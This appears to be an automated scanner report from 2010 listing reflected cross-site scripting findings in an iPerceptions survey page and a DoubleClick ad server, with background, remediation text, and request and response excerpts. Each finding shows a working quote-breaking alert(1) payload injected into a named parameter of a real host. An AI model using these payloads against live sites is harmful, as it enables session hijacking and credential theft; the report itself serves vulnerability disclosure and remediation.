Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the sdfc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23d3f'-alert(1)-'3687970a447 was submitted in the sdfc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1.aspx?sdfc=299f610e-24038-38153450-25fe-438c-8517-2aca3243ff7523d3f'-alert(1)-'3687970a447&lID=1&loc=4Q-WEB2 HTTP/1.1
Host: 4qinvite.4q.iperceptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Nov 2010 17:17:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Srv-By: 4Q-INVITE2
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=auwb01i1a2g3ks3mlhwi5jmt; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1089
var sID= '24038'; var sC= 'IPE24038'; var brow= 'IE'; var vers= '7.0'; var lID= '1'; var loc= '4Q-WEB2'; var ps= 'sdfc=299f610e-24038-38153450-25fe-438c-8517-2aca3243ff7523d3f'-alert(1)-'3687970a447&lID=1&loc=4Q-WEB2';var sGA='';function setupGA(url) { return url;}var tC= 'IPEt'; var tCv='?'; CCook(tC,tC,0); tCv= GetC(tC);if (GetC(sC)==null && tCv != null) {CCook(sC,sC,30); Ld();} DCook(tC);funct ...[SNIP]...
The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 956a5"-alert(1)-"417ab19093e was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... /181/%2a/z%3B231241976%3B1-0%3B0%3B55844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5956a5"-alert(1)-"417ab19093e&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0 ...[SNIP]...
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f470"-alert(1)-"d3cac9a52e0 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... -300/250%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=200122536f470"-alert(1)-"d3cac9a52e0&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event ...[SNIP]...
The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9600a"-alert(1)-"d571cc2dd60 was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:12:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=9600a"-alert(1)-"d571cc2dd60&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa"); var fsc ...[SNIP]...
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fc0c"-alert(1)-"c3d973c4897 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:12:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 5%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=8fc0c"-alert(1)-"c3d973c4897&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efeff"-alert(1)-"757feda799a was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6914
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 38009996/38027753/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3efeff"-alert(1)-"757feda799a&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http:// ...[SNIP]...
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e9c4"-alert(1)-"0b886bae39e was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=2e9c4"-alert(1)-"0b886bae39e&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na ...[SNIP]...
The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84813"-alert(1)-"890b6b1225 was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6897
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 22 Nov 2010 00:13:43 GMT
Expires: Mon, 22 Nov 2010 00:13:43 GMT
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=84813"-alert(1)-"890b6b1225http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ...[SNIP]...
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 766b0"-alert(1)-"ab23b56765f was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... /3a5a/17/181/%2a/z%3B231241976%3B1-0%3B0%3B55844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn766b0"-alert(1)-"ab23b56765f&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222. ...[SNIP]...
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f565a"-alert(1)-"9d4fb7009e3 was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:06:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... /k%3B231241976%3B2-0%3B0%3B55844876%3B4307-300/250%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_USf565a"-alert(1)-"9d4fb7009e3&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI ...[SNIP]...
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b891f"-alert(1)-"1810bff2486 was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:08:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... %3B55844876%3B4307-300/250%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080b891f"-alert(1)-"1810bff2486&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11 ...[SNIP]...
The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ccc4"-alert(1)-"9b23ea1ba4b was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... %3Dv8/3a5a/17/181/%2a/z%3B231241976%3B1-0%3B0%3B55844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a8ccc4"-alert(1)-"9b23ea1ba4b&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121 ...[SNIP]...
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fad38"-alert(1)-"c08febe9059 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=fad38"-alert(1)-"c08febe9059&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_sourc ...[SNIP]...
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8bca5"-alert(1)-"629032b61be was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6914
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... og.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com8bca5"-alert(1)-"629032b61be&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=e ...[SNIP]...
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1c83"-alert(1)-"afe2288af06 was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... a/17/181/%2a/z%3B231241976%3B1-0%3B0%3B55844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2a1c83"-alert(1)-"afe2288af06&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&p ...[SNIP]...
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2abbd"-alert(1)-"5fda04e4c5c was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com2abbd"-alert(1)-"5fda04e4c5c&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_med ...[SNIP]...
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8bcfe"-alert(1)-"9006f31a0a5 was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:13:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 1&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI8bcfe"-alert(1)-"9006f31a0a5&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa"); var fscUrl = url; var fscUrlClickTagFound = false;
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25277"-alert(1)-"1ddf9b03232 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=25277"-alert(1)-"1ddf9b03232&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.2 ...[SNIP]...
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d0be"-alert(1)-"7df4c502bea was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 0%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=1007d0be"-alert(1)-"7df4c502bea&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/htt ...[SNIP]...
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 288db"-alert(1)-"a81bde65779 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913
